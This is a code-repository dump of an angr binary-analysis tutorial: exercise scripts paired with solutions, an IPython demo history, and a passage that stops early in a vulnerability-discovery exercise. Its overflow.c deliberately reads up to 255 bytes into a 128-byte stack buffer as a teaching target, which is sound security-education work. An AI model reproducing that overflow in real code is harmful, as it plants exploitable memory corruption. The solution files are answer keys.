├── README.md
├── cfg_accurate
    ├── 0.py
    ├── 0.solution.py
    ├── 1.py
    ├── 1.solution.py
    └── fauxware
├── cfg_fast
    ├── 0.py
    ├── 0.solution.py
    ├── 1.py
    ├── 1.solution.py
    ├── cfg_2
    └── fauxware
├── ddg
    ├── 0.py
    ├── 0.solution.py
    └── fauxware
├── ipython_history.txt
├── vfg
    ├── 0.py
    ├── 0.solution.py
    └── fauxware
├── vuln_discovery
    ├── overflow
    ├── overflow.c
    ├── vuln.py
    └── vuln.solution.py
├── vuln_discovery_2
    ├── overflow3-28d8a442fb232c0c
    ├── overflow3-28d8a442fb232c0c.c
    ├── overflow3.py
    └── overflow3.solution.py
└── vuln_discovery_simple
    ├── overflow3-simplified
    ├── overflow3-simplified.c
    ├── overflow3.py
    └── overflow3.solution.py


/README.md:
--------------------------------------------------------------------------------
1 | 
2 | # SecDev angr Tutorial
3 | 
4 | The slides are [here](https://goo.gl/YHdmDB).
5 | 


--------------------------------------------------------------------------------
/cfg_accurate/0.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | '''
 4 | Generate an accurate CFG on the fauxware binary, and take a look at its program states.
 5 | '''
 6 | 
 7 | import angr
 8 | 
 9 | # load the binary
10 | project = angr.Project("fauxware")
11 | 
12 | # WRITEME: generate an accurate CFG
13 | # since we want to see its program states generated during CFG recovery, we should specify 'keep_state=True'
14 | cfg = None
15 | 
16 | # Alright, we got it!
17 | if cfg is not None:
18 |     all_nodes = cfg.nodes()
19 | 
20 |     for n in all_nodes:
21 |         print("%s:\t\tstate %s, eax %s, ecx %s" % (n, n.input_state, n.input_state.regs.eax, n.input_state.regs.ecx))
22 | 
23 | 


--------------------------------------------------------------------------------
/cfg_accurate/0.solution.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | '''
 4 | Generate an accurate CFG on the fauxware binary, and take a look at its program states.
 5 | '''
 6 | 
 7 | import angr
 8 | 
 9 | # load the binary
10 | project = angr.Project("fauxware")
11 | 
12 | # WRITEME: generate an accurate CFG
13 | # since we want to see its program states generated during CFG recovery, we should specify 'keep_state=True'
14 | cfg = project.analyses.CFGAccurate(keep_state=True)
15 | 
16 | # Alright, we got it!
17 | if cfg is not None:
18 |     all_nodes = cfg.nodes()
19 | 
20 |     for n in all_nodes:
21 |         print("%s:\t\tstate %s, eax %s, ecx %s" % (n, n.input_state, n.input_state.regs.eax, n.input_state.regs.ecx))
22 | 
23 | 


--------------------------------------------------------------------------------
/cfg_accurate/1.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | '''
 4 | Demonstrate how to normalize a CFG
 5 | '''
 6 | 
 7 | from pprint import pprint
 8 | 
 9 | import angr
10 | 
11 | # load the binary
12 | project = angr.Project('fauxware')
13 | 
14 | # WRITEME: to generate a normalized CFG, simply specify `normalize=True` during initialization
15 | cfg_norm = None
16 | 
17 | # this is a normal CFG
18 | cfg = project.analyses.CFG()
19 | 
20 | # There should be some different nodes
21 | if cfg_norm is not None:
22 |     nodes_norm = cfg_norm.nodes()
23 |     nodes = cfg.nodes()
24 | 
25 |     nodes_only_in_normalized = set()
26 | 
27 |     for n in nodes_norm:
28 |         if any([nn for nn in nodes if nn.addr == n.addr and nn.size == n.size]):
29 |             continue
30 |         nodes_only_in_normalized.add(n)
31 | 
32 |     assert nodes_only_in_normalized
33 |     pprint(nodes_only_in_normalized)
34 | 
35 | 


--------------------------------------------------------------------------------
/cfg_accurate/1.solution.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | '''
 4 | Demonstrate how to normalize a CFG
 5 | '''
 6 | 
 7 | from pprint import pprint
 8 | 
 9 | import angr
10 | 
11 | # load the binary
12 | project = angr.Project('fauxware')
13 | 
14 | # WRITEME: to generate a normalized CFG, simply specify `normalize=True` during initialization
15 | cfg_norm = project.analyses.CFG(normalize=True)
16 | 
17 | # this is a normal CFG
18 | cfg = project.analyses.CFG()
19 | 
20 | # There should be some different nodes
21 | if cfg_norm is not None:
22 |     nodes_norm = cfg_norm.nodes()
23 |     nodes = cfg.nodes()
24 | 
25 |     nodes_only_in_normalized = set()
26 | 
27 |     for n in nodes_norm:
28 |         if any([nn for nn in nodes if nn.addr == n.addr and nn.size == n.size]):
29 |             continue
30 |         nodes_only_in_normalized.add(n)
31 | 
32 |     assert nodes_only_in_normalized
33 |     pprint(nodes_only_in_normalized)
34 | 
35 | 


--------------------------------------------------------------------------------
/cfg_accurate/fauxware:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/cfg_accurate/fauxware


--------------------------------------------------------------------------------
/cfg_fast/0.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | from pprint import pprint
 4 | 
 5 | import angr
 6 | 
 7 | project = angr.Project("fauxware")
 8 | 
 9 | # WRITEME: generate a CFG
10 | cfg = None
11 | 
12 | # WRITEME: print out all nodes
13 | all_nodes = None
14 | pprint(all_nodes)
15 | 
16 | # WRITEME: get any CFG node whose address is 0x80485fc
17 | # 0x80485fc is the address of main()
18 | node = None
19 | print("Node 0x80485fc: %s" % node)
20 | 
21 | # WRITEME: get all CFG nodes whose address is 0x80485fc
22 | node_list = None
23 | print("All node whose address is 0x80485fc: %s" % node_list)
24 | 
25 | # WRITEME: get a list of successors of that node, including the fakeret target, using methods from the CFG
26 | successors = None
27 | print("All successors to node %s are:" % node)
28 | pprint(successors)
29 | 
30 | # WRITEME: get a list of successors of that node, using the `successors` property from the CFG node itself
31 | # this time it does not include the fakeret target
32 | successors = None
33 | print("All successors to node %s are:" % node)
34 | pprint(successors)
35 | 
36 | 


--------------------------------------------------------------------------------
/cfg_fast/0.solution.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | from pprint import pprint
 4 | 
 5 | import angr
 6 | 
 7 | project = angr.Project("fauxware")
 8 | 
 9 | # WRITEME: generate a CFG
10 | cfg = project.analyses.CFG()
11 | 
12 | # WRITEME: print out all nodes
13 | all_nodes = cfg.nodes()
14 | pprint(all_nodes)
15 | 
16 | # WRITEME: get any CFG node whose address is 0x80485fc
17 | # 0x80485fc is the address of main()
18 | node = cfg.get_any_node(0x80485fc)
19 | print("Node 0x80485fc: %s" % node)
20 | 
21 | # WRITEME: get all CFG nodes whose address is 0x80485fc
22 | node_list = cfg.get_all_nodes(0x80485fc)
23 | print("All node whose address is 0x80485fc: %s" % node_list)
24 | 
25 | # WRITEME: get a list of successors of that node, including the fakeret target, using methods from the CFG
26 | successors = cfg.get_successors(node, excluding_fakeret=False)
27 | print("All successors to node %s are:" % node)
28 | pprint(successors)
29 | 
30 | # WRITEME: get a list of successors of that node, using the `successors` property from the CFG node itself
31 | # this time it does not include the fakeret target
32 | successors = node.successors
33 | print("All successors to node %s are:" % node)
34 | pprint(successors)
35 | 
36 | 


--------------------------------------------------------------------------------
/cfg_fast/1.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | from pprint import pprint
 4 | 
 5 | import angr
 6 | 
 7 | p = angr.Project("cfg_2")
 8 | 
 9 | # WRITEME: generate a CFG that collects data references during CFG recovery
10 | # Note that by default it resolves indirect jumps (like jump tables)
11 | cfg = None
12 | 
13 | # WRITEME: print out the recovered indirect jumps
14 | indirect_jumps = None
15 | print("Here are all indirect jumps from the binary:")
16 | pprint(indirect_jumps)
17 | 
18 | # WRITEME: print out the recovered list of memory data
19 | memory_data = None
20 | print("Here are all recovered memory data from the binary:")
21 | pprint(memory_data)
22 | 
23 | # WRITEME: print out the reverse mapping from instruction addresses to memory data
24 | ins_to_memdata = None
25 | print("Here is a mapping between instruction address and memory data:")
26 | pprint(ins_to_memdata)
27 | 
28 | 


--------------------------------------------------------------------------------
/cfg_fast/1.solution.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | from pprint import pprint
 4 | 
 5 | import angr
 6 | 
 7 | p = angr.Project("cfg_2")
 8 | 
 9 | # WRITEME: generate a CFG that collects data references during CFG recovery
10 | # Note that by default it resolves indirect jumps (like jump tables)
11 | cfg = p.analyses.CFG(collect_data_references=True)
12 | 
13 | # WRITEME: print out the recovered indirect jumps
14 | indirect_jumps = cfg.indirect_jumps
15 | print("Here are all indirect jumps from the binary:")
16 | pprint(indirect_jumps)
17 | 
18 | # WRITEME: print out the recovered list of memory data
19 | memory_data = cfg.memory_data
20 | print("Here are all recovered memory data from the binary:")
21 | pprint(memory_data)
22 | 
23 | # WRITEME: print out the reverse mapping from instruction addresses to memory data
24 | ins_to_memdata = cfg._insn_addr_to_memory_data
25 | print("Here is a mapping between instruction address and memory data:")
26 | pprint(ins_to_memdata)
27 | 
28 | 


--------------------------------------------------------------------------------
/cfg_fast/cfg_2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/cfg_fast/cfg_2


--------------------------------------------------------------------------------
/cfg_fast/fauxware:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/cfg_fast/fauxware


--------------------------------------------------------------------------------
/ddg/0.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | '''
 4 | We'd like to figure out the dependency between registers and memory variables in function authenticate
 5 | '''
 6 | 
 7 | from pprint import pprint
 8 | 
 9 | import angr
10 | 
11 | # load the project
12 | 
13 | p = angr.Project("fauxware")
14 | 
15 | # WRITEME: get the address of function `authenticate`
16 | cfg_fast = None
17 | main_func = None
18 | auth_func = None
19 | 
20 | # Note: we create a new knowledge base to use with CFGAccurate and DDG analysis
21 | # we don't want to mess with the default (project-level) knowledge base
22 | # this is just a good habit :-)
23 | kb = angr.knowledge_base.KnowledgeBase(p, p.loader.main_bin)
24 | 
25 | # WRITEME: generate an accurate CFG
26 | # Recommended parameters:
27 | # starts=(main_func.addr,)
28 | # context_sensitivity_level=2
29 | # keep_state=True  # states must be kept and stored to allow dependence analysis later
30 | cfg = None
31 | 
32 | # WRITEME: initialize DDG analysis with the accurate CFG and the new knowledge base, and specify the `start`
33 | ddg = None
34 | 
35 | if ddg is not None:
36 |     # YES it's done! Let's see what's there
37 |     print("=== Statement Dependence Graph ===")
38 |     print("Edges:")
39 |     edges = ddg.graph.edges(data=True)
40 |     pprint(edges, width=120)
41 | 
42 |     print("=== Data Dependence Graph ===")
43 |     print("Edges:")
44 |     edges = ddg.data_graph.edges(data=True)
45 |     pprint(edges, width=120)
46 | 
47 |     print("=== Simplified Data Dependence Graph ===")
48 |     print("Edges:")
49 |     edges = ddg.simplified_data_graph.edges(data=True)
50 |     pprint(edges, width=120)
51 | 
52 | 


--------------------------------------------------------------------------------
/ddg/0.solution.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | '''
 4 | We'd like to figure out the dependency between registers and memory variables in function authenticate
 5 | '''
 6 | 
 7 | from pprint import pprint
 8 | 
 9 | import angr
10 | 
11 | # load the project
12 | 
13 | p = angr.Project("fauxware")
14 | 
15 | # WRITEME: get the address of function `authenticate`
16 | cfg_fast = p.analyses.CFG()
17 | main_func = p.kb.functions.function(name='main')
18 | auth_func = p.kb.functions.function(name='authenticate')
19 | 
20 | # Note: we create a new knowledge base to use with CFGAccurate and DDG analysis
21 | # we don't want to mess with the default (project-level) knowledge base
22 | # this is just a good habit :-)
23 | kb = angr.knowledge_base.KnowledgeBase(p, p.loader.main_bin)
24 | 
25 | # WRITEME: generate an accurate CFG
26 | # Recommended parameters:
27 | # starts=(main_func.addr,)
28 | # context_sensitivity_level=2
29 | # keep_state=True  # states must be kept and stored to allow dependence analysis later
30 | cfg = p.analyses.CFGAccurate(starts=(main_func.addr,),
31 |                              context_sensitivity_level=2,
32 |                              keep_state=True
33 |                              )
34 | 
35 | # WRITEME: initialize DDG analysis with the accurate CFG and the new knowledge base, and specify the `start`
36 | ddg = p.analyses.DDG(cfg=cfg, start=auth_func.addr, kb=kb)
37 | 
38 | if ddg is not None:
39 |     # YES it's done! Let's see what's there
40 |     print("=== Statement Dependence Graph ===")
41 |     print("Edges:")
42 |     edges = ddg.graph.edges(data=True)
43 |     pprint(edges, width=120)
44 | 
45 |     print("=== Data Dependence Graph ===")
46 |     print("Edges:")
47 |     edges = ddg.data_graph.edges(data=True)
48 |     pprint(edges, width=120)
49 | 
50 |     print("=== Simplified Data Dependence Graph ===")
51 |     print("Edges:")
52 |     edges = ddg.simplified_data_graph.edges(data=True)
53 |     pprint(edges, width=120)
54 | 
55 | 


--------------------------------------------------------------------------------
/ddg/fauxware:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/ddg/fauxware


--------------------------------------------------------------------------------
/ipython_history.txt:
--------------------------------------------------------------------------------
  1 | 
  2 | # Captured on Windows 10 with Python 2.7.11 + IPython 5.1.0
  3 | 
  4 | # This is the beginning of IPython history
  5 | import angr
  6 | 
  7 | # Load the fauxware project
  8 | project = angr.Project("fauxware/fauxware")
  9 | project.loader.main_bin
 10 | project.loader.main_object
 11 | project.loader.all_objects
 12 | project.loader.main_object.imports
 13 | project.loader.main_object.sections
 14 | type(project.loader.main_object.sections)
 15 | project.loader.main_object.sections
 16 | project.loader.main_object.sections.raw_list
 17 | 
 18 | winproject = angr.Project("C:/Windows/System32/notepad.exe")  # it took a long time and did not finish, Yan had to ctrl-c it.
 19 | 
 20 | winproject = angr.Project("C:/Windows/System32/notepad.exe", auto_load_libs=False)  # this finished very quickly
 21 | winproject.loader.missing_dependencies
 22 | winproject.loader.all_objects
 23 | winproject.loader.main_object.imports
 24 | winproject.loader.main_object.sections
 25 | winproject.loader.main_object.sections.raw_list
 26 | cfg = winproject.analyses.CFG()
 27 | cfg = winproject.analyses.CFG(show_progressbar=True)
 28 | len(cfg.nodes())
 29 | cfg.nodes()
 30 | cfg.graph
 31 | cfg.graph.edges()
 32 | winproject.kb
 33 | winproject.kb.callgraph
 34 | winproject.kb.callgraph.edges()
 35 | [ map(hex, x) for x in winproject.kb.callgraph.edges() ]
 36 | 
 37 | history  # Yan was demonstrating the "history" command in IPython
 38 | 
 39 | winproject.kb
 40 | winproject.kb.functions
 41 | winproject.kb.functions[project.entry]
 42 | winproject.kb.functions[winproject.entry]
 43 | entry_function = winproject.kb.functions[winproject.entry]
 44 | entry_function.graph
 45 | entry_function.graph.edges()
 46 | entry_function.blocks
 47 | list(entry_function.blocks)
 48 | entry_function.code_constants
 49 | 
 50 | # Print out all blocks
 51 | for block in entry_function.blocks: print block
 52 | 
 53 | # Print out the disassembly of all blocks
 54 | for block in entry_function.blocks: block.pp()
 55 | 
 56 | # Print the VEX IR of all blocks
 57 | for block in entry_function.blocks: block.vex.pp()
 58 | 
 59 | block = winproject.factory.block(0x14001957e)
 60 | block.pp()
 61 | simgr = winproject.factory.simulation_manager()
 62 | simgr
 63 | simgr.active[0]
 64 | simgr.active[0].regs.rax
 65 | simgr.active[0].regs.rcx
 66 | simgr.step()
 67 | simgr.step()
 68 | simgr.step()
 69 | simgr.active[0]
 70 | simgr.step()
 71 | simgr.active[0]
 72 | cfg.get_any_node(0x141000730)
 73 | cfg
 74 | 
 75 | simgr = project.factory.simulation_manager()
 76 | cfg = project.analyses.CFG(show_progressbar=True)
 77 | 
 78 | simgr.step()
 79 | simgr.active[0]
 80 | simgr.step()
 81 | simgr.active[0]
 82 | cfg.get_any_node(0x400540)
 83 | cfg.get_any_node(0x400540).successors
 84 | simgr.step(until=lamda sm: len(sm.active) != 1)
 85 | simgr.step(until=lambda sm: len(sm.active) != 1)
 86 | simgr.active
 87 | simgr.active[0].history
 88 | simgr.active[0].history.bbl_addrs
 89 | list(simgr.active[0].history.bbl_addrs)
 90 | map(hex, list(simgr.active[0].history.bbl_addrs))
 91 | project.loader.describe_addr(0x1000020)
 92 | map(hex, list(simgr.active[0].history.descriptions))
 93 | maplist(simgr.active[0].history.descriptions)
 94 | list(simgr.active[0].history.descriptions)
 95 | 
 96 | cfg.get_any_node(0x40068e)
 97 | cfg.get_any_node(0x40068e).successors
 98 | state = simgr.active[0]
 99 | 
100 | state.history
101 | state.history.actions
102 | list(state.history.actions)
103 | list(state.history.guards)
104 | list(state.history.jump_guards)
105 | list(simgr.active[0].history.jump_guards)
106 | list(simgr.active[1].history.jump_guards)
107 | 
108 | simgr.active[0].rax
109 | simgr.active[0].regs.rax
110 | simgr.active[1].regs.rax
111 | state.memory.load(state.regs.rsp, 8)
112 | state.memory.load(state.regs.rsp, 8, endness="Iend_LE")
113 | 
114 | state.posix.files
115 | stdin = state.posix.files[0]
116 | stdin.all_bytes()
117 | state.solver.eval(state.posix.files[0])
118 | state.solver.eval(state.posix.files[0].all_bytes())
119 | state.solver.eval(state.posix.files[0].all_bytes(), cast_to=str)
120 | state = simgr.active[1]
121 | state.solver.eval(state.posix.files[0].all_bytes(), cast_to=str)
122 | state.solver.eval_upto(state.posix.files[0].all_bytes(), 10, cast_to=str)
123 | stdin = state.posix.files[0]
124 | state = simgr.active[0]
125 | state.solver.eval_upto(state.posix.files[0].all_bytes(), 10, cast_to=str)
126 | state.posix.files[0]
127 | stdin.read_from
128 | stdin.read_from?
129 | stdin.read_pos?
130 | stdin.read?
131 | stdin.contents
132 | stdin.content
133 | stdin.content.load(10, 8)
134 | state.solver.eval_upto(stdin.content.load(9, 8), 10, cast_to=str)
135 | simgr.active
136 | simgr.mp_active
137 | simgr.mp_active.regs.rax
138 | simgr.mp_active.regs.rax.mp_items
139 | simgr.mp_active.solver.eval_upto(simgr.mp_active.files[0].content.load(9, 8), 1, cast_to=str)
140 | simgr.mp_active.solver.eval_upto(simgr.mp_active.posix.files[0].content.load(9, 8), 1, cast_to=str)
141 | simgr.mp_active.solver.eval_upto(simgr.mp_active.posix.files[0].content.load(9, 8), 1, cast_to=str).mp_items
142 | state.history.jump_guard
143 | 
144 | state.history.jump_guard.op
145 | state.history.jump_guard.args
146 | state.history.jump_guard.args
147 | state.history.jump_guard.args[0]
148 | state.history.jump_guard.args[0]
149 | state.history.jump_guard.args[0] + 0
150 | simgr.run()
151 | 
152 | simgr.mp_active.solver.eval_upto(simgr.mp_active.posix.files[0].content.load(9, 8), 2, cast_to=str).mp_items
153 | simgr.mp_deadended.solver.eval_upto(simgr.mp_deadended.posix.files[0].content.load(9, 8), 2, cast_to=str).mp_items
154 | simgr.mp_active.solver.eval_upto(simgr.mp_active.posix.files[1].all_bytes(), 2, cast_to=str).mp_items
155 | simgr.mp_deadended.solver.eval_upto(simgr.mp_deadended.posix.files[1].all_bytes(), 2, cast_to=str).mp_items
156 | simgr.mp_deadended.posix.files
157 | simgr.mp_deadended.posix.files.mp_items
158 | simgr.mp_deadended.solver.constraints
159 | simgr.mp_deadended.solver.jump_guards.mp_map(list)
160 | simgr.mp_deadended.history.jump_guards.mp_map(list)
161 | simgr.mp_deadended.history.jump_guards.mp_map(list).mp_items
162 | simgr = project.factory.simulation_manager()
163 | simgr
164 | 
165 | cfg.functions
166 | cfg.functions.keys()
167 | project.loader.main_object.symbols_by_addr
168 | project.kb.functions['accepted']
169 | 
170 | simgr.explore(find=project.kb.functions['accepted'].addr)
171 | simgr.found
172 | simgr.found.posix.dumps(0)
173 | simgr.found[0].posix.dumps(0)
174 | simgr = project.factory.simulation_manager()
175 | simgr
176 | 
177 | simgr.use_technique(angr.exploration_techniques.DFS())
178 | # Use the DFS exploration technique
179 | simgr._hooks_all
180 | simgr.step()
181 | simgr.step()
182 | simgr.step()
183 | simgr.step()
184 | simgr.step()
185 | simgr.step(until=lambda sm: 'deferred' in simgr.stashes)
186 | simgr.step(until=lambda sm: 'deferred' in simgr.stashes)
187 | simgr.step(until=lambda sm: 'deferred' in sm.stashes)
188 | sm.deferred
189 | simgr.step(until=lambda sm: len(sm.deferred) != 0)
190 | simgr.step()
191 | simgr.step()
192 | simgr.step(until=lambda sm: len(sm.deferred) != 0)
193 | simgr.step()
194 | simgr.step()
195 | simgr.step()
196 | simgr.step()
197 | simgr.step()
198 | simgr.step()
199 | simgr.step()
200 | simgr.step()
201 | simgr.step()
202 | simgr.step()
203 | simgr.step()
204 | simgr.step()
205 | simgr.step()
206 | simgr.step()
207 | simgr.step()
208 | simgr.step()
209 | simgr.step()
210 | simgr.step()
211 | simgr.step()
212 | simgr.step()
213 | simgr.step()
214 | simgr.step()
215 | simgr.step()
216 | simgr.step()
217 | simgr.step()
218 | simgr.step()
219 | simgr.step()
220 | simgr.step()
221 | simgr.step()
222 | simgr.step()
223 | simgr.step()
224 | simgr.step()
225 | simgr.step()
226 | simgr.step()
227 | simgr.step()
228 | simgr.step()
229 | simgr.step()
230 | simgr.step()
231 | simgr.step()
232 | simgr.step()
233 | simgr.step()
234 | simgr.step()
235 | def always_succeed(state): state.regs.rax = 1
236 | project.hook?
237 | project.hook(0x4007b9, always_succeed, length=0)
238 | 
239 | simgr = project.factory.simulation_manager()
240 | simgr.run()
241 | simgr.mp_deadended
242 | simgr.mp_deadended.posix.dumps(1)
243 | simgr.mp_deadended.posix.dumps(1).mp_items
244 | class Return0(angr.SimProcedure): def run(state): return 0
245 | class Return0(angr.SimProcedure):
246 |     def run(self, state):
247 |         return 0
248 | project = angr.Project("fauxware/fauxware")
249 | project.hook(0x400664, Return0)
250 | project.hook(0x400664, Return0())
251 | project.hook(0x400664, Return0(), replace=True)
252 | simgr = project.factory.simulation_manager()
253 | simgr.run()
254 | simgr.deadended[0].posix.dumps(1)
255 | simgr.deadended[0].posix.dumps(0)
256 | simgr.deadended[0].posix.dumps(1)
257 | simgr = winproject.factory.simulation_manager()
258 | simgr.step(n=10)
259 | simgr = winproject.factory.simulation_manager()
260 | simgr.step()
261 | simgr.step()
262 | simgr.step()
263 | simgr.step()
264 | simgr.step()
265 | simgr.step()
266 | simgr.step()
267 | simgr.step()
268 | simgr.step()
269 | simgr.step()
270 | simgr.step()
271 | debug
272 | 
273 | project = angr.Project("f:/angr/angr-doc/examples/whitehat_crypto400/whitehat_crypto400")
274 | project.loader.main_object
275 | project.loader.main_object.symbols_by_addr
276 | project.loader.main_object.imports
277 | project.loader.main_object
278 | project.loader.all_objects
279 | 
280 | simgr = project.factory.simulation_manager()
281 | simgr.step(until=lambda sm=len(sm.active) >= 10)
282 | simgr.step(until=lambda sm:len(sm.active) >= 10)
283 | simgr.step(until=lambda sm:len(sm.active) >= 20)
284 | simgr.step(until=lambda sm:len(sm.active) >=100)
285 | simgr
286 | 
287 | simgr.step(until=lambda sm:len(sm.active) >= 100)
288 | 
289 | # Use DFS instead of BFS for symbolic exploration
290 | simgr.use_technique(angr.exploration_techniques.DFS())
291 | simgr.step()
292 | simgr.step()
293 | simgr.step()
294 | simgr.step()
295 | simgr.step()
296 | simgr.step()
297 | simgr.step()
298 | simgr.step()
299 | simgr.step()
300 | simgr.step()
301 | simgr.step()
302 | simgr.step()
303 | simgr.step()
304 | simgr.step()
305 | simgr.step()
306 | simgr.step()
307 | simgr.step()
308 | simgr.step(n=10)
309 | simgr.step(n=10)
310 | simgr.step(n=10)
311 | simgr.step(n=10)
312 | simgr.step(n=10)
313 | simgr.step(n=100)
314 | simgr.step(n=100)
315 | 
316 | project
317 | project.kb
318 | project.kb.functions
319 | project.kb.functions.keys()
320 | cfg = project.analyses.CFG()
321 | project = angr.Project("fauxware/fauxware")
322 | cfg = project.analyses.CFG()
323 | project.kb.functions
324 | project.kb.functions.keys()
325 | project.kb.functions.values()
326 | project.kb.functions.values()[0]
327 | func = project.kb.functions.values()[0]
328 | func.name
329 | func.addr
330 | func.graph


--------------------------------------------------------------------------------
/vfg/0.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | '''
 4 | We'd like to understand the stack layout of the main function by generating a VFG on it.
 5 | '''
 6 | 
 7 | from pprint import pprint
 8 | from collections import defaultdict
 9 | 
10 | import angr
11 | 
12 | 
13 | # create the project
14 | project = angr.Project("fauxware")
15 | 
16 | # WRITEME: generate a CFG first so we have access to all functions
17 | cfg = None
18 | 
19 | # WRITEME: get the address of the main function
20 | main_func = None
21 | 
22 | # WRITEME: run VFG on it
23 | # Here is the suggested parameter setup
24 | # context_sensitivity_level: 3
25 | # interfunction_level: 3
26 | vfg = None
27 | print("VFG analysis is over. We have some nodes now:")
28 | if vfg is not None:
29 |     pprint(vfg.graph.nodes())
30 | 
31 | # WRITEME: get the input state to the very last basic block
32 | # the very last basic block in the main function is 0x80486e8
33 | # it should have captured all previous effects
34 | last_node = None
35 | last_state = None
36 | 
37 | # WRITEME: Get the memory object.
38 | # the memory used in static analysis is an abstract memory model (implemented in SimAbstractMemory)
39 | # it's basically a mapping from region names (like "stack_0x400000") to a symbolic memory instance (SimSymbolicMemory)
40 | memory = None
41 | print("Program memory of the very last state: %s" % memory)
42 | 
43 | # WRITEME: Let's take a look at the regions
44 | regions = None
45 | print("All memory regions on the stack:")
46 | pprint(regions)
47 | 
48 | if regions is not None:
49 |     # WRITEME: Now we can have a look at the abstract locations (alocs) of the main function's stack region
50 |     main_func_region = None
51 |     alocs = None
52 | 
53 |     print("Abstract locations of the main procedure are:")
54 |     pprint(alocs)
55 | 
56 |     # WRITEME: Derive stack layout information from abstract locations
57 |     # you may dig a little bit into the source code of SimuVEX and claripy to see what members an aloc has.
58 |     # the related code is in abstract_memory.py in SimuVEX and in the vsa subpackage in claripy.
59 |     # by default, region.alocs is a dict mapping (block address, statement ID) to a list of memory targets.
60 |     # what we want is the stack offset and size of each corresponding memory access
61 |     # let's do it here
62 | 
63 |     stack_layout = defaultdict(set)  # map offset to size
64 | 
65 |     # WRITEME: traverse alocs
66 | 
67 |     print("The stack layout looks like:")
68 |     for offset in sorted(stack_layout.keys(), reverse=True):
69 |         print("%#x %s" % (offset, stack_layout[offset]))
70 | 
71 | 


--------------------------------------------------------------------------------
/vfg/0.solution.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | '''
 4 | We'd like to understand the stack layout of the main function by generating a VFG on it.
 5 | '''
 6 | 
 7 | from pprint import pprint
 8 | from collections import defaultdict
 9 | 
10 | import angr
11 | 
12 | 
13 | # create the project
14 | project = angr.Project("fauxware")
15 | 
16 | # WRITEME: generate a CFG first so we have access to all functions
17 | cfg = project.analyses.CFG()
18 | 
19 | # WRITEME: get the address of the main function
20 | main_func = project.kb.functions.function(name='main')
21 | 
22 | # WRITEME: run VFG on it
23 | # Here is the suggested parameter setup
24 | # context_sensitivity_level: 3
25 | # interfunction_level: 3
26 | vfg = project.analyses.VFG(start=main_func.addr,
27 |                            context_sensitivity_level=3,
28 |                            interfunction_level=3
29 |                            )
30 | print("VFG analysis is over. We have some nodes now:")
31 | pprint(vfg.graph.nodes())
32 | 
33 | # WRITEME: get the input state to the very last basic block
34 | # the very last basic block in the main function is 0x80486e8
35 | # it should have captured all previous effects
36 | last_node = vfg.get_any_node(0x80486e8)
37 | last_state = last_node.state
38 | 
39 | # WRITEME: Get the memory object.
40 | # the memory used in static analysis is an abstract memory model (implemented in SimAbstractMemory)
41 | # it's basically a mapping from region names (like "stack_0x400000") to a symbolic memory instance (SimSymbolicMemory)
42 | memory = last_state.memory
43 | print("Program memory of the very last state: %s" % memory)
44 | 
45 | # WRITEME: Let's take a look at the regions
46 | regions = memory.regions
47 | print("All memory regions on the stack:")
48 | pprint(regions)
49 | 
50 | if regions is not None:
51 |     # WRITEME: Now we can have a look at the abstract locations (alocs) of the main function's stack region
52 |     main_func_region = regions.get('stack_%#x' % main_func.addr)
53 |     alocs = main_func_region.alocs
54 | 
55 |     print("Abstract locations of the main procedure are:")
56 |     pprint(alocs)
57 | 
58 |     # WRITEME: Derive stack layout information from abstract locations
59 |     # you may dig a little bit into the source code of SimuVEX and claripy to see what members an aloc has.
60 |     # the related code is in abstract_memory.py in SimuVEX and in the vsa subpackage in claripy.
61 |     # by default, region.alocs is a dict mapping (block address, statement ID) to a list of memory targets.
62 |     # what we want is the stack offset and size of each corresponding memory access
63 |     # let's do it here
64 | 
65 |     stack_layout = defaultdict(set)  # map offset to size
66 |     for aloc in alocs.values():
67 |         for segment in aloc._segment_list:
68 |             stack_layout[segment.offset].add(segment.size)
69 | 
70 |     print("The stack layout looks like:")
71 |     for offset in sorted(stack_layout.keys(), reverse=True):
72 |         print("%#x %s" % (offset, stack_layout[offset]))
73 | 
74 | 


--------------------------------------------------------------------------------
/vfg/fauxware:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/vfg/fauxware


--------------------------------------------------------------------------------
/vuln_discovery/overflow:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/angr/secdev-course/6fec37cf4f35444fcc12121ca3d3b37c8394fe7f/vuln_discovery/overflow


--------------------------------------------------------------------------------
/vuln_discovery/overflow.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <unistd.h>
 3 | 
 4 | int main()
 5 | {
 6 | 	char buf[128];
 7 | 	unsigned char size;
 8 | 
 9 | 	printf("How much to read? ");
10 | 	scanf("%hhd\n", &size);
11 | 
12 | 	if (size > 128) printf("Uh oh, reading up to %d bytes...\n", size);
13 | 	printf("Received: %d bytes.\n", fread(buf, 1, size, stdin));
14 | }
15 | 


--------------------------------------------------------------------------------
/vuln_discovery/vuln.py:
--------------------------------------------------------------------------------
 1 | import angr
 2 | 
 3 | # load the binary
 4 | project = angr.Project("overflow", load_options={ 'auto_load_libs': False })
 5 | 
